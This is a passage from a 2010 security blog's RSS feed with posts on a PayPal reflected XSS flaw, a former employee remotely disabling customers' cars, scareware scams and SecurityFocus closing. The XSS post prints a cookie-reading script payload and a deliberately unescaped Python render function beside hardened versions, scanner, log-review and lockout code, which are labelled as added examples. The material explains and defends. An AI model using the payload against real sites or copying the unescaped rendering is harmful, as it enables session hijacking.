<p>While the definition keeps expanding, XSS attacks are generally considered a type of injection problem: malicious input is injected into an otherwise trusted web page, causing unexpected behavior such as sending data to or from an unknown third-party web site (hence cross site). Because the script runs in the context of the trusted web site, it has access to any cookies not flagged HttpOnly, including session tokens, and to any other user information available within that site&#8217;s security context; even where the session cookie is HttpOnly, the injected script can still issue requests that carry the victim&#8217;s session. XSS vulnerabilities are common in web applications and will occur wherever untrusted input is neither validated by the application nor encoded before being output back to the user.</p>
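<p>To make the reflection concrete, the following Python is an added example (not code from the post, the Full Disclosure posting, or PayPal). It rebuilds the page fragment quoted above from a constructed template, renders it once with the raw parameter and once with the parameter entity-encoded for an HTML element context, and pulls the parameter out of the post&#8217;s path-style URL. The template, the helper names, and the crude &#8220;does a script run&#8221; check are assumptions for illustration; the attack string is the one from the posting.</p>

```python
import html
from urllib.parse import urlsplit, parse_qs, unquote

# Constructed to mirror the fragment reproduced in the post: the reflected
# parameter lands inside <h1> in the error header of the page.
TEMPLATE = (
    '<div class="legacyErrors " id="page">\n'
    '<div id="header"><h1>{business}</h1></div>\n'
    '<hr>'
)


def business_from_url(url: str) -> str:
    """Pull the 'business' value out of a request URL.

    The URL in the post carries it as a path segment (/xclick/business=...),
    not as a query string, so both forms are handled. Only percent-encoding
    is undone: the result is the raw attacker-controlled string.
    """
    parts = urlsplit(url)
    from_query = parse_qs(parts.query).get("business")
    if from_query:
        return from_query[0]
    marker = "business="
    i = parts.path.find(marker)
    return unquote(parts.path[i + len(marker):]) if i >= 0 else ""


def render_vulnerable(business: str) -> str:
    """Untrusted input concatenated straight into the markup: reflected XSS."""
    return TEMPLATE.format(business=business)


def render_hardened(business: str) -> str:
    """Same page, with the value entity-encoded for an HTML element context
    before it is written out. <, >, &, " and ' all become entities, so the
    browser renders the payload as text instead of parsing it as a tag."""
    return TEMPLATE.format(business=html.escape(business, quote=True))


def script_executes(page: str) -> bool:
    """Crude stand-in for a browser's parser: an unencoded <script> tag in
    element content runs; an entity-encoded one is inert text."""
    return "<script" in page.lower()


if __name__ == "__main__":
    url = 'https://www.paypal.com/xclick/business=<script> alert(document.cookie); </script>'
    value = business_from_url(url)
    print(render_vulnerable(value))
    print(render_hardened(value))
```

<p>Entity encoding is the fix for this particular sink (element content). The same value placed into an attribute, a URL, or inline JavaScript needs the encoding appropriate to that context, which is the point of the per-context rules in the OWASP cheat sheet linked below.</p>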

<h3>PayPal</h3>

<p>The San Jose based company is owned by eBay, has more than 78 million customer accounts, and clears many of the transactions on the popular auction site. The service allows users to send money without sharing financial information with the other party, a key enabler for sending and receiving money from third parties on the Internet. It operates in some 190 markets around the world and handles 19 different currencies.</p>

<p>In 2008 roughly $60 billion dollars moved through Paypal&#8217;s systems.</p>

<p>PayPal does make available additional authentication protection in the form of <a href="https://www.paypal.com/cgi-bin/webscr?cmd=xpt/Marketing_CommandDriven/securitycenter/PayPalSecurityKey-outside">a one time password token</a> that it calls a &#8216;security key&#8217; (similar to the ones made popular by RSA). The token costs five dollars and is available to residents of Australia, Germany, Canada, the United Kingdom and the United States. PayPal however allows this hard token to be bypassed by entering other information such as a credit card or bank account number, which severely undercuts its effectiveness as a security measure.</p>

<p>Stronger authentication &#8220;on the front door&#8221; of the web site (the login screen) does not, in any case, prevent a user session from being hijacked after authentication, which is exactly what a cross site scripting attack like this one permits.</p>

<h3>PCI Compliance</h3>

<p>Of note is that PayPal does claim PCI compliance, involving the following activities <a href="https://www.paypal.com/pcicompliance">in their words</a>:</p>

<ul>
<li>Maintain a vulnerability management program</li>
<li>Pass quarterly remove vulnerability scans</li>
</ul>

<p>The wording of that second bullet on the PayPal site is presumably a typo for &#8220;remote&#8221;: PCI DSS requires quarterly external vulnerability scans, run remotely against the in-scope Internet-facing systems by an Approved Scanning Vendor.</p>

<p>The attack string above is basic enough that it would, or should, be tested for and picked up by the most rudimentary web scanners available, which throws the validity of whatever scanning is being done into question. Actual credit card data is displayed in an obfuscated form in the Profile section of the web site (only the last four digits show), so perhaps this page was considered out of scope for the PCI-required scan.</p>
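<p>Here is the kind of rudimentary check a scanner runs, as an added example in Python that is not part of the post or of any scanning product: a random canary carrying the characters an injection needs is submitted as the parameter value, and the response is classified by whether the canary came back raw, entity-encoded, with its brackets stripped, or not at all. The three endpoints are constructed stand-ins that return a body directly instead of going over HTTP; the first mimics the raw reflection shown above.</p>

```python
import html
import secrets


def make_probe():
    """Return (tag, probe). The probe carries angle brackets and both quote
    styles around a random tag so it cannot collide with page content."""
    tag = secrets.token_hex(4)
    return tag, f'<xss{tag}>"\''


def reflection_verdict(tag: str, body: str) -> str:
    """Classify how a response body treated the probe.

    unencoded : reflected verbatim, tags can be injected (the /xclick/business case)
    encoded   : reflected with < and > entity-encoded; inert in element content
    filtered  : the marker survived but the brackets did not; worth a manual look
    absent    : parameter not reflected at all
    """
    if f"<xss{tag}>" in body:
        return "unencoded"
    if f"&lt;xss{tag}&gt;" in body:
        return "encoded"
    if f"xss{tag}" in body:
        return "filtered"
    return "absent"


# Constructed stand-ins for three endpoints. A real scanner would send the
# probe over HTTP and read the body back; here each handler returns the body.
ENDPOINTS = {
    "/xclick/business": lambda v: f'<div id="header"><h1>{v}</h1></div>',   # reflects raw
    "/search": lambda v: f'<p>No results for {html.escape(v, quote=True)}</p>',  # encodes
    "/help": lambda v: '<p>Contact support.</p>',                              # ignores input
}


def scan(endpoints) -> dict:
    """Probe every endpoint once and map path -> verdict."""
    tag, probe = make_probe()
    return {path: reflection_verdict(tag, handler(probe)) for path, handler in endpoints.items()}


if __name__ == "__main__":
    for path, verdict in scan(ENDPOINTS).items():
        print(f"{path}: {verdict}")
```

<p>An &#8220;unencoded&#8221; verdict is a candidate, not a confirmed finding; the context the value lands in (element content, attribute, script block) still has to be checked. An &#8220;encoded&#8221; verdict only says element content is safe, since a value reflected inside an attribute or a script can be exploited without angle brackets.</p>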

<p>Separately, the scanalert.com URL, a redirect to the McAfee scanning service that PayPal provides to its business customers at no cost for a year, presents a bad digital certificate.</p>

<h3>Finally</h3>

<p>Generally users can apply for refunds from PayPal when an account has been broken into, but like any other service there are <a href="http://www.paypalsucks.com">a share of horror stories</a>. In general a site such as this should <a href="http://www.owasp.org/index.php/XSS_%28Cross_Site_Scripting%29_Prevention_Cheat_Sheet">escape all output</a> that originates from untrusted sources; given the variety of possible attack strings this is not foolproof, but it is a significant mitigation against injection attacks. This is not PayPal&#8217;s first brush with the problem: <a href="http://www.channelregister.co.uk/2008/05/16/paypal_page_succumbs_to_xss/">in 2008 a similar issue</a> was identified by Harry Sintonen. As PayPal is, for many users of eBay and other online services, the only payment game in town (the only one a seller will accept), this type of issue needs to be corrected quickly and comprehensively: ideally a site-wide change to introduce web vulnerability scanning, escape all user-provided input when it is output, and validate all user-provided input.</p>

<h3>References</h3>

<ul>
<li><a href="http://seclists.org/fulldisclosure/2010/Mar/486">Full Disclosure &#8211; Paypal XSS Vulnerability</a></li>
</ul>

<p><strong>Related Posts:</strong></p>
<ul>
<li><a href="http://praetorianprefect.com/archives/2010/06/f-secure-xss-on-anti-theft-website/">F-Secure XSS on Anti-Theft Website</a></li>
<li><a href="http://praetorianprefect.com/archives/2010/06/formspring-me-xss-vulnerability/">Formspring.me XSS Vulnerability</a></li>
<li><a href="http://praetorianprefect.com/archives/2009/12/pentagon-web-pwned/">Pentagon Web Site Vulnerabilities Identified</a></li>
</ul><br />
]]></content:encoded>
			<wfw:commentRss>http://praetorianprefect.com/archives/2010/03/xss-flaw-on-paypal-com/feed/</wfw:commentRss>
		<slash:comments>6</slash:comments>
		</item>
		<item>
		<title>Bad Password Management Will Stop You in Your Tracks</title>
		<link>http://praetorianprefect.com/archives/2010/03/bad-password-management-will-stop-you-in-your-tracks/</link>
		<comments>http://praetorianprefect.com/archives/2010/03/bad-password-management-will-stop-you-in-your-tracks/#comments</comments>
		<pubDate>Thu, 18 Mar 2010 01:37:49 +0000</pubDate>
		<dc:creator>Prefect</dc:creator>
				<category><![CDATA[Access Control]]></category>
		<category><![CDATA[password management]]></category>
		<category><![CDATA[termination checklist]]></category>

		<guid isPermaLink="false">http://praetorianprefect.com/?p=3562</guid>
		<description><![CDATA[Refusing to maintain and follow a good termination checklist that walks through what access rights to decommission when someone leaves your company can put the brakes on your customers’ good will. Texas Auto Center in Austin Texas demonstrated the headaches that ensue when in February they left more than 80 customers who financed cars unable to get to school, work, and stuck with charges for towing and unnecessary repair work.

Originally diagnosed as mechanical failures in the cars, the problems stopped as soon as all the passwords for the WebTeckPlus system used by the firm were reset. A recently terminated employee, twenty year old Omar Ramos-Lopez, had used still active credentials to login to the web administration portal of the Auto Center’s payment incentive vendor and used it to disable vehicle starters or, according to police reports, have horns honk through the night.]]></description>
			<content:encoded><![CDATA[<p><a href="http://praetorianprefect.com/wp-content/uploads/2010/03/PT_System.jpg"><img class="alignleft size-thumbnail wp-image-3564" title="PT_System" src="http://praetorianprefect.com/wp-content/uploads/2010/03/PT_System-150x150.jpg" alt="PT_System" width="150" height="150" /></a></p>

<p>Refusing to maintain and follow a good termination checklist that walks through what access rights to decommission when someone leaves your company can put the brakes on your customers’ good will. Texas Auto Center in Austin Texas demonstrated the headaches that ensue when in February they left more than 80 customers who financed cars unable to get to school, work, and stuck with charges for towing and unnecessary repair work.</p>

<p>Originally diagnosed as mechanical failures in the cars, the problems stopped as soon as all the passwords for the WebTeckPlus system used by the firm were reset. A recently terminated employee, twenty year old Omar Ramos-Lopez, had used still active credentials to login to the web administration portal of the Auto Center’s payment incentive vendor and used it to disable vehicle starters or, according to police reports, have horns honk through the night.</p>

<p>In the case of Ramos-Lopez, Texas Auto Center claims that his account was terminated when he was part of a reduction in force last month, but that he used another employee’s account to access the system. Once in, he began perusing the database of 1,100 Texas Auto Center customers with the device installed, first targeting specific customers and then going down the list corrupting records, setting off car horns, and disabling cars. When police obtained access logs from the vendor, Pay Technologies LLC, the Internet Protocol address of Ramos-Lopez’s AT&amp;T Internet service showed up.</p>

<p><div id="attachment_3565" class="wp-caption alignnone" style="width: 410px"><a href="http://praetorianprefect.com/wp-content/uploads/2010/03/texas_auto_mall.jpg"><img src="http://praetorianprefect.com/wp-content/uploads/2010/03/texas_auto_mall.jpg" alt="The Texas Auto Mall in Austin, TX." title="texas_auto_mall" width="400" height="179" class="size-full wp-image-3565" /></a><p class="wp-caption-text">The Texas Auto Mall in Austin, TX.</p></div>
<br /></p>

<h3>Payment Incentive Systems</h3>

<p>The types of systems used to remotely disable the vehicles are largely designed to replace physical repossessions at so called subprime auto dealers. What started as somewhat clunky keypads that required vehicle operators to punch in five digit codes to get a vehicle to start, a code given to them when their car payment was made, has moved to more sophisticated remote technology. Devices such as these have been around for a little more than 15 years now. Their functionality falls into two categories, solutions that render the vehicle inoperative and those that allow for electronically locating the vehicle (GPS) for repossession.</p>

<p>The vendor in this case, Pay Technologies LLC in Cleveland, offers such services under the labels WebTeck and PayTeck GPS. Their model has auto dealers install a small black box under the car’s dashboard. The device responds to commands relayed over a wireless pager network, commands that are sent from a web based dashboard maintained by Pay Technologies. Honking the car horn or disabling the car’s ignition are examples of what dealers are able to do. Note that a running car cannot be shut off, for obvious safety reasons.</p>

<p>Proponents of these payment incentive systems state that without them, persons with severely damaged credit would not be able to finance the same type of car they are able to purchase with the assurances provided by these devices. In a 2005 article, one dealer is quoted as stating that his repossessions dropped from 45% to 15% and allowed him to make car sales to buyers who would normally be shut out of financing options.</p>

<p>Still, the devices make people uncomfortable. There is the threat of being stranded, although dealers are advised to only cut off starters early in the morning, to avoid that happening. Further there is the question about what happens in an emergency. In the case of Pay Technologies, a 24 hour grace period can be enabled, allowing the car to start, in the case of such emergency. Finally, the GPS tracking raises privacy concerns.</p>

<p>Despite these issues, court challenges to the devices have largely been unsuccessful when proper disclosure of the device’s installation is made. In a 1999 filing against Mel Farr, a football Hall of Fame member and Detroit auto dealer, a handful of customers sought to have the devices removed as dangerous. The court sided with Farr.</p>

<h3>Information Security Considerations</h3>

<p>Looking at this from an information security perspective, a couple of problems come to light. First, even though Ramos-Lopez’s own account was disabled, the dealership was aware that password sharing was going on and that a reduction in force was taking place; a company-wide password reset following the terminations would have avoided the whole episode. Working toward eliminating password sharing (prevent concurrent logins from different IPs, report on unusual login activity) is good practice as well.</p>

<p>On a more general note, an effective access management practice has a number of characteristics. Chief among these is that access rights are reviewed together with business managers at a regular interval (quarterly or monthly, depending on your risk disposition), whenever someone undergoes a significant role transfer within the firm, and most importantly when someone leaves the firm. The management overhead of this process shrinks when the raw number of password authentication systems is limited through enabling technologies such as central authentication and authorization services or single sign on. Put simply, users have fewer passwords to track and protect, fewer passwords need to be changed in response to business events, and access rights are easier to review when some consistency exists between the applications installed across an enterprise.</p>
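<p>As an added example in Python (not code from the post, the dealership, or Pay Technologies), the following turns the two practices just described into checks that run over constructed data: an HR roster, the portal&#8217;s account list, and a handful of made-up access log lines in a key=value format, using hypothetical usernames and RFC 5737 documentation addresses. It reports accounts still enabled for people who have left, accounts used from more than one address, attempts against disabled accounts, and the pattern in this case: an address that once authenticated as a leaver&#8217;s own account later authenticating as a colleague&#8217;s.</p>

```python
from collections import defaultdict
from datetime import datetime

# Constructed sample data. Names are hypothetical; IPs are RFC 5737 test ranges.
ROSTER = {                       # employee id -> (name, termination date or None)
    "E100": ("A. Dealer", None),
    "E101": ("O. Ramos", "2010-02-01"),
    "E102": ("J. Doe", "2010-02-01"),
}
ACCOUNTS = {                     # portal username -> (owner employee id, enabled?)
    "adealer": ("E100", True),
    "oramos": ("E101", False),   # disabled at the RIF, as the dealer stated
    "jdoe": ("E102", True),      # the termination checklist missed this one
}
LOG = """\
2010-01-20T09:01:00 user=oramos ip=203.0.113.7 result=ok
2010-01-20T09:05:00 user=adealer ip=198.51.100.2 result=ok
2010-02-17T02:14:00 user=adealer ip=203.0.113.7 result=ok
2010-02-17T02:15:00 user=adealer ip=203.0.113.7 result=ok
2010-02-18T23:40:00 user=adealer ip=198.51.100.2 result=ok
2010-02-19T03:02:00 user=oramos ip=203.0.113.7 result=denied
"""


def parse_log(text):
    """One event per line: an ISO timestamp followed by key=value fields."""
    events = []
    for line in text.splitlines():
        ts, *fields = line.split()
        event = dict(f.split("=", 1) for f in fields)
        event["ts"] = datetime.fromisoformat(ts)
        events.append(event)
    return events


def orphaned_accounts(roster, accounts):
    """Enabled accounts whose owner has been terminated: the first thing a
    termination checklist review should turn up."""
    return sorted(user for user, (owner, enabled) in accounts.items()
                  if enabled and roster[owner][1] is not None)


def shared_accounts(events):
    """Accounts that authenticated successfully from more than one source IP,
    which is what password sharing looks like in an access log."""
    ips = defaultdict(set)
    for e in events:
        if e["result"] == "ok":
            ips[e["user"]].add(e["ip"])
    return {user: sorted(addrs) for user, addrs in ips.items() if len(addrs) > 1}


def disabled_account_attempts(events, accounts):
    """Failed attempts against accounts that are disabled: someone is still
    trying the old credentials."""
    return [(e["ts"].isoformat(), e["user"], e["ip"]) for e in events
            if e["result"] != "ok" and not accounts[e["user"]][1]]


def leaver_ip_reuse(events, roster, accounts):
    """Source IPs that authenticated as a now-terminated employee's own account
    and, on or after the termination date, as somebody else's account."""
    leaver_ips = {}                      # ip -> (leaver's username, termination date)
    for e in events:
        term = roster[accounts[e["user"]][0]][1]
        if e["result"] == "ok" and term is not None:
            leaver_ips[e["ip"]] = (e["user"], datetime.fromisoformat(term))
    findings = []
    for e in events:
        hit = leaver_ips.get(e["ip"])
        if hit and e["result"] == "ok" and e["user"] != hit[0] and e["ts"] >= hit[1]:
            findings.append((e["ts"].isoformat(), e["user"], e["ip"], hit[0]))
    return findings


def access_review(roster=ROSTER, accounts=ACCOUNTS, log=LOG):
    """Run all four checks and return the findings keyed by check name."""
    events = parse_log(log)
    return {
        "orphaned_accounts": orphaned_accounts(roster, accounts),
        "shared_accounts": shared_accounts(events),
        "disabled_account_attempts": disabled_account_attempts(events, accounts),
        "leaver_ip_reuse": leaver_ip_reuse(events, roster, accounts),
    }


if __name__ == "__main__":
    for check, findings in access_review().items():
        print(check, findings)
```

<p>The leaver-IP check is the one that would have surfaced this incident from the vendor&#8217;s logs without waiting for a police request; it depends on the portal logging source address, username and outcome for every attempt, which is the minimum worth asking a vendor for.</p>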

<h3>Also</h3>

<p>Perhaps a second relevant question for the information security community is why attacks on these systems haven&#8217;t happened more often. Crackers, despite reports that they have all moved to a purely economic incentive, still perform acts of mischief. The administrative web site for this system, a system that can be used to disable automobiles, is protected by <a href="https://ssl47.pair.com/payteck/webteckplus/index.php">a simple password login</a> that is open to brute force attack. The answer may simply be that the existence of this technology and how it worked was not well known. As Pay Technologies CEO Jim Krueger noted, this is the first time this technology has been abused. Now that its existence is more public, one can wager that it won&#8217;t be the last.</p>

<p>Also, Ramos-Lopez didn&#8217;t &#8216;hack&#8217; anything.</p>
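<p>The brute-force exposure noted above is the one part of this story with a straightforward engineering fix. As an added example in Python (not Pay Technologies&#8217; code; the account name, password, and thresholds are made up), the following throttles failed logins per account and per source address, consults the throttle before the password is verified so that a locked account rejects even the right password, and walks a short brute-force sequence against a deterministic clock.</p>

```python
import hashlib
import hmac
import os
import time
from collections import defaultdict, deque


class LoginThrottle:
    """Failure counters per account and per source IP, consulted before the
    password is checked. The default limits are illustrative only."""

    def __init__(self, max_per_account=5, lock_seconds=900,
                 max_per_ip=20, ip_window=300, clock=time.monotonic):
        self.max_per_account = max_per_account
        self.lock_seconds = lock_seconds
        self.max_per_ip = max_per_ip
        self.ip_window = ip_window
        self.clock = clock
        self.account_failures = defaultdict(int)
        self.locked_until = {}
        self.ip_failures = defaultdict(deque)    # ip -> timestamps of recent failures

    def _recent_ip_failures(self, ip, now):
        q = self.ip_failures[ip]
        while q and now - q[0] > self.ip_window:  # drop failures outside the window
            q.popleft()
        return len(q)

    def allow(self, user, ip):
        """Returns (allowed, reason). Called before password verification, so a
        locked account rejects even the right password until the lock expires."""
        now = self.clock()
        if now < self.locked_until.get(user, 0):
            return False, "account locked"
        if self._recent_ip_failures(ip, now) >= self.max_per_ip:
            return False, "source throttled"
        return True, "ok"

    def record(self, user, ip, success):
        now = self.clock()
        if success:
            self.account_failures.pop(user, None)
            return
        self.ip_failures[ip].append(now)
        self.account_failures[user] += 1
        if self.account_failures[user] >= self.max_per_account:
            self.locked_until[user] = now + self.lock_seconds
            self.account_failures.pop(user, None)


class ManualClock:
    """Deterministic clock so the lockout can be exercised without sleeping."""
    def __init__(self):
        self.now = 0.0

    def __call__(self):
        return self.now

    def advance(self, seconds):
        self.now += seconds


def _hash(password, salt):
    # Iteration count kept low for the demo; production should use far more.
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 50_000)


# Constructed credential store with one hypothetical dealer account.
_SALT = os.urandom(16)
CREDENTIALS = {"dealer_admin": (_SALT, _hash("correct horse battery staple", _SALT))}


def attempt_login(throttle, user, password, ip):
    allowed, reason = throttle.allow(user, ip)
    if not allowed:
        return reason
    salt, expected = CREDENTIALS.get(user, (b"\0" * 16, b""))
    ok = bool(expected) and hmac.compare_digest(_hash(password, salt), expected)
    throttle.record(user, ip, ok)
    return "success" if ok else "bad password"


def simulate_bruteforce(guesses, real_password, user="dealer_admin", ip="203.0.113.7"):
    """Wrong guesses, then the right password while locked, then after expiry."""
    clock = ManualClock()
    throttle = LoginThrottle(clock=clock)
    outcomes = [attempt_login(throttle, user, g, ip) for g in guesses]
    outcomes.append(attempt_login(throttle, user, real_password, ip))
    clock.advance(throttle.lock_seconds + 1)
    outcomes.append(attempt_login(throttle, user, real_password, ip))
    return outcomes


if __name__ == "__main__":
    print(simulate_bruteforce(["password", "123456", "dealer", "letmein", "admin"],
                              "correct horse battery staple"))
```

<p>Per-account lockout on its own hands an attacker a way to lock legitimate dealers out on purpose, which for a system that disables cars matters; that is why the per-source throttle and an alert on lockouts belong alongside it rather than lockout alone.</p>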

<h3>References</h3>

<ul>
<li><a href="http://www.wired.com/threatlevel/2010/03/hacker-bricks-cars/">Hacker Disables More Than 100 Cars Remotely</a></li>
<li><a href="http://www.texasautocenter.net/">Texas Auto Center</a></li>
<li><a href="http://www.payteck.cc">Pay Technologies</a></li>
<li><a href="http://www.usatoday.com/tech/news/techinnovations/2005-11-29-tech-repo-man_x.htm">High-tech &#8216;repo man&#8217; keeps car payments coming</a></li>
</ul>

]]></content:encoded>
			<wfw:commentRss>http://praetorianprefect.com/archives/2010/03/bad-password-management-will-stop-you-in-your-tracks/feed/</wfw:commentRss>
		<slash:comments>2</slash:comments>
		</item>
		<item>
		<title>The Proliferation Of Scareware Hits Home</title>
		<link>http://praetorianprefect.com/archives/2010/03/the-proliferation-of-scareware-hits-home/</link>
		<comments>http://praetorianprefect.com/archives/2010/03/the-proliferation-of-scareware-hits-home/#comments</comments>
		<pubDate>Wed, 17 Mar 2010 02:14:46 +0000</pubDate>
		<dc:creator>Prefect</dc:creator>
				<category><![CDATA[scareware]]></category>
		<category><![CDATA[antivirus]]></category>
		<category><![CDATA[rogue antivirus]]></category>
		<category><![CDATA[seo poisoning]]></category>

		<guid isPermaLink="false">http://praetorianprefect.com/?p=3572</guid>
		<description><![CDATA[The agitation in the voice on the phone shook me from sleep early Saturday morning: My Uncle the surgeon had a computer problem and he was concerned enough to call. He explained he had been trying to view pictures of a newly renovated base in South Korea when all of a sudden McAfee popped up and did a scan, revealing 28 viruses. But for some reason the new module McAfee wanted him to install wasn’t working because the site wouldn’t accept either of his credit card numbers.]]></description>
			<content:encoded><![CDATA[<p><a href="http://praetorianprefect.com/wp-content/uploads/2010/03/scareware2.jpg"><img src="http://praetorianprefect.com/wp-content/uploads/2010/03/scareware2-150x150.jpg" alt="scareware2" title="scareware2" width="150" height="150" class="alignleft size-thumbnail wp-image-3575" /></a></p>

<p>The agitation in the voice on the phone shook me from sleep early Saturday morning: My Uncle the surgeon had a computer problem and he was concerned enough to call. He explained he had been trying to view pictures of a newly renovated base in South Korea when all of a sudden McAfee popped up and did a scan, revealing 28 viruses. But for some reason the new module McAfee wanted him to install wasn’t working because the site wouldn’t accept either of his credit card numbers.</p>

<p>Most security professionals don’t need any further information to know what happened, and that it wasn’t the McAfee installation firing these apparent anti-virus (AV) alerts. Instead this was a web page with animations masquerading as the Windows My Computer screen and an AV dialog. Accepting the download led to a malicious software installation and a payment screen, a scam commonly referred to as scareware. Scareware is software sold or downloaded by creating the perception of a threat, playing off the user’s fear and anxiety about viruses and spyware infecting his or her computer. The real McAfee <a href="http://newsroom.mcafee.com/article_display.cfm?article_id=3631">estimates</a> that worldwide scareware scams rake in more than $300 million annually, with infections up 660% over the past two years. The number of scareware product variants was about <a href="http://www.trustedsource.org/blog/393/Scareware-Poses-Danger-to-Consumers">142 in 2004</a>; 110 new variants were tracked in just the first two months of 2010.</p>

<p>The software, originally spread through classic methods such as spam, has moved on to more sophisticated distribution: links to infected web sites placed in popular social media content on Twitter, YouTube, and <a href="http://praetorianprefect.com/archives/2009/10/facebook%e2%80%99s-faith-a-new-scareware-attack/">Facebook</a>, corrupted advertisements fed into the ad networks that web sites use, and poisoned search results, a technique called Search Engine Optimization (SEO) poisoning.</p>

<p>This last attack, SEO poisoning, was what infected my Uncle: a web search was poisoned with results from compromised legitimate web sites. By creating content stuffed with popular terms and linking back to it from legitimately ranked sites, the rules search engines like Google use to prioritize results are subverted. The video below demonstrates the effect with search results that showed up on the first page of Google results shortly after the earthquake in Haiti:</p>

<p><object width="400" height="310"><param name="allowfullscreen" value="true" /><param name="allowscriptaccess" value="always" /><param name="movie" value="http://vimeo.com/moogaloop.swf?clip_id=8748497&amp;server=vimeo.com&amp;show_title=1&amp;show_byline=1&amp;show_portrait=0&amp;color=&amp;fullscreen=1" /><embed src="http://vimeo.com/moogaloop.swf?clip_id=8748497&amp;server=vimeo.com&amp;show_title=1&amp;show_byline=1&amp;show_portrait=0&amp;color=&amp;fullscreen=1" type="application/x-shockwave-flash" allowfullscreen="true" allowscriptaccess="always" width="400" height="310"></embed></object>
<br /></p>

<p>This rogue anti-virus/spyware software is distributed through a complex network involving around fifty known companies at the top building and distributing software to affiliates who earn rewards for successful sales. The companies at the top of this scheme operate at times with such impunity that their executives are bold enough to have professional profiles on the <a href="http://www.trustedsource.org/blog/393/Scareware-Poses-Danger-to-Consumers">business networking site LinkedIn</a>.</p>

<p>In October of 2008 one of these networks was mapped out when a hacker named Neon broke into a computer housing accounting information for a Russian company called Bakasoftware. This company provided access to solicited affiliates through an online control panel providing varied methods of infecting computers. Affiliates could earn from <a href="http://www.secpoint.com/Bakasoftware-Russian-Scareware-Named-and-Shamed-By-Hacker.html">58% to 90% commission</a> on sales of the rogue software.</p>

<p><div id="attachment_3577" class="wp-caption alignleft" style="width: 310px"><a href="http://praetorianprefect.com/wp-content/uploads/2010/03/trafficconficker_lexuscontest_crop.jpg"><img src="http://praetorianprefect.com/wp-content/uploads/2010/03/trafficconficker_lexuscontest_crop-300x180.jpg" alt="The Lexus Contest." title="trafficconficker_lexuscontest_crop" width="300" height="180" class="size-medium wp-image-3577" /></a><p class="wp-caption-text">The Lexus Contest.</p></div>
<br /></p>

<p>At times creative bonuses are involved: one contest by a site called TrafficConverter.Biz offered <a href="http://lastwatchdog.com/scareware-attacks-spreading-twitter-google-legit/">a $36,000 Lexus</a> to the top affiliate. In 2008, the top five affiliates in the Russian Baka Software Gang averaged weekly commissions of $107,604 according to documentation found by researcher Joe Stewart. When the Federal Trade Commission obtained a court order to stop Belize’s Innovative Marketing from selling rogue software, the firm had made approximately $180 million dollars in a year through four million customers who purchased the software thinking it was real. There is probably no better metaphor though than the high end Mercedes sedan once displayed on scam web site iframeCASH.biz, known to be similar to the model driven by its founder and scareware pioneer, St. Petersburg’s Andrej Sporaw.</p>

<p><div id="attachment_3579" class="wp-caption alignright" style="width: 261px"><a href="http://praetorianprefect.com/wp-content/uploads/2010/03/iframe_cash.jpg"><img src="http://praetorianprefect.com/wp-content/uploads/2010/03/iframe_cash.jpg" alt="iFrame Cash." title="iframe_cash" width="251" height="237" class="size-full wp-image-3579" /></a><p class="wp-caption-text">iFrame Cash.</p></div>
<br /></p>

<p>My Uncle was mildly embarrassed by the entire episode, but should not be, because the techniques used to propagate these scams have become so advanced that the educated and computer savvy among us are not immune. The software replicated the logos, the look and feel of the anti-virus he knew he had installed. The sophistication of these schemes has risen alongside the profit available to be made. He was under the impression of many Internet users: as long as he had his anti-virus software installed, kept Windows updated, didn’t open strange e-mails, and stayed away from strange web sites he would be safe using the Internet. When legitimate web sites are compromised with scripts launching fake AV dialogues, these rules do not apply. Such methods have led to an estimated one million victims of scareware per day worldwide.</p>

<p>Fortunately in my Uncle’s case he was able to cancel the credit cards involved and clean up the PC before experiencing any problems. Others have had their PCs hijacked, with the rogue software preventing updates to legitimate software, locking up the PC, resisting un-installation, installing further malware, and generating a constant stream of pop ups in the web browser.</p>

<p>How do you avoid the scam? Remember that no legitimate anti-virus company will perform an unsolicited scan of your computer and ask for payment to correct issues identified. Close out of the browser when you see such a dialog come up. Run scans with your legitimate anti-virus and anti-spyware solutions on your PC (remember though that these installations are designed to work around anti-virus before you get too frustrated). Finally consult with a colleague who has experience in dealing with information security problems.</p>

<p>Information technology folks are usually willing to help; they know that when you work in technology you will always be your own family’s private help desk, a little like how the family doctor is always stuck giving everyone medical advice.</p>

<p><strong>Related Posts:</strong></p>
<ul>
<li><a href="http://praetorianprefect.com/archives/2010/01/scareware-purveyors-spammers-and-crooks-take-advantage-of-haiti-earthquake/">Scareware Purveyors, Spammers, and Crooks Take Advantage of Haiti Earthquake</a></li>
</ul><br />
]]></content:encoded>
			<wfw:commentRss>http://praetorianprefect.com/archives/2010/03/the-proliferation-of-scareware-hits-home/feed/</wfw:commentRss>
		<slash:comments>2</slash:comments>
		</item>
		<item>
		<title>A Loss of SecurityFocus</title>
		<link>http://praetorianprefect.com/archives/2010/03/a-loss-of-securityfocus/</link>
		<comments>http://praetorianprefect.com/archives/2010/03/a-loss-of-securityfocus/#comments</comments>
		<pubDate>Thu, 11 Mar 2010 17:11:32 +0000</pubDate>
		<dc:creator>Prefect</dc:creator>
				<category><![CDATA[Industry News]]></category>
		<category><![CDATA[bugtraq]]></category>
		<category><![CDATA[securityfocus]]></category>
		<category><![CDATA[symantec]]></category>

		<guid isPermaLink="false">http://praetorianprefect.com/?p=3755</guid>
		<description><![CDATA[The announcement came out earlier today that SecurityFocus, a long standing security news portal started in 1999 and home of a number of popular mailing lists including the well known Bugtraq is being shuttered by Symantec. While aspects of the site will continue (the mailing lists will remain and some content will be moved to Symantec Connect), the loss of the news portal and site itself is a significant loss of historical perspective on the information security industry from what was a long standing news and research source.]]></description>
			<content:encoded><![CDATA[<p><a href="http://praetorianprefect.com/wp-content/uploads/2010/03/security_focus_logo.jpg"><img src="http://praetorianprefect.com/wp-content/uploads/2010/03/security_focus_logo.jpg" alt="security_focus_logo" title="security_focus_logo" width="100" height="100" class="alignleft size-full wp-image-3757" /></a></p>

<p>The announcement came out earlier today that SecurityFocus, a long-standing security news portal started in 1999 and home to a number of popular mailing lists, including the well-known Bugtraq, is being shuttered by Symantec. While aspects of the site will continue (the mailing lists will remain and some content will be moved to Symantec Connect), the loss of the news portal and the site itself is a significant loss of historical perspective on the information security industry from what was a long-standing news and research source.</p>

<p>From the announcement:</p>

<p><i>
Beginning March 15, 2010 SecurityFocus will begin a transition of its content to Symantec Connect. As part of its continued commitment to the community, all of SecurityFocus’ mailing lists including Bugtraq and its Vulnerability Database will remain online at www.securityfocus.com. There will not be any changes to any of the list charters or policies and the same teams who have moderated list traffic will continue to do so. The vulnerability database will continue to be updated and made available as it is currently. DeepSight and other security intelligence related offerings will remain unchanged while Infocus articles, whitepapers, and other SecurityFocus content will be available off of the main Symantec website in the coming months.
</i><br /> From: <a href="http://www.securityfocus.com/news/11582">Change in Focus</a></p>

